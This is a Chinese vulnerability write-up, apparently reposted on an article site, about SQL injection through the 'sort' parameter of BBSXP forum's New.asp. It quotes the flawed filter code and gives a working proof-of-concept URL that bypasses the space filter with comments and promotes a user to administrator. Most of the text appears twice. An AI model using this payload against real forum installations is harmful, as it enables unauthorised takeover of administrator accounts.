BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
程序员文章站
2022-09-30 14:21:57
受影响系统:
BBSXP7.3
BBSXP2008
漏洞文件:
New.asp
代码分析:
Sort=HTMLEncode(Request("Sort")) //第24行
if Sort = empty then
SqlSort="T... 08-10-08...
受影响系统:
bbsxp7.3
bbsxp2008 漏洞文件:
new.asp 代码分析: sort=htmlencode(request("sort")) //第24行 if sort = empty then
sqlsort="threadid"
else
sqlsort=sort
end if
。。。。。。
sql="select top "&sqltopiccount&" * from ["&tableprefix&"threads] where visible=1 "&sqlforumid&" "&sqltimelimit&" order by "&sqlsort&" desc" //第66行 过滤函数htmlencode 在文件bbsxp_class.asp中:
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42)&chr(42),"**") '“**”/**/
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([&#])([a-z0-9]*);","$1$2;") if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*")) if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if htmlencode=fstring
end function
htmlencode过滤了tab键,空格,** .
变量sqlsort过滤不严导致sql注入漏洞的产生。 漏洞测试:
http://localhost/bbsxp/new.asp?sort=threadid/*o*/update/*o*/bbsxp_users/*o*/set/*o*/userroleid=1/*o*/where/*o*/username=0x6c006f00760065006d006d006d00/*o*/select/*o*/*/*o*/from/*o*/bbsxp_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用post提交呵呵)
bbsxp7.3
bbsxp2008 漏洞文件:
new.asp 代码分析: sort=htmlencode(request("sort")) //第24行 if sort = empty then
sqlsort="threadid"
else
sqlsort=sort
end if
。。。。。。
sql="select top "&sqltopiccount&" * from ["&tableprefix&"threads] where visible=1 "&sqlforumid&" "&sqltimelimit&" order by "&sqlsort&" desc" //第66行 过滤函数htmlencode 在文件bbsxp_class.asp中:
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42)&chr(42),"**") '“**”/**/
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([&#])([a-z0-9]*);","$1$2;") if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*")) if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if htmlencode=fstring
end function
htmlencode过滤了tab键,空格,** .
变量sqlsort过滤不严导致sql注入漏洞的产生。 漏洞测试:
http://localhost/bbsxp/new.asp?sort=threadid/*o*/update/*o*/bbsxp_users/*o*/set/*o*/userroleid=1/*o*/where/*o*/username=0x6c006f00760065006d006d006d00/*o*/select/*o*/*/*o*/from/*o*/bbsxp_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用post提交呵呵)
上一篇: 不懂编程能建站吗?一个自助建站高手养成记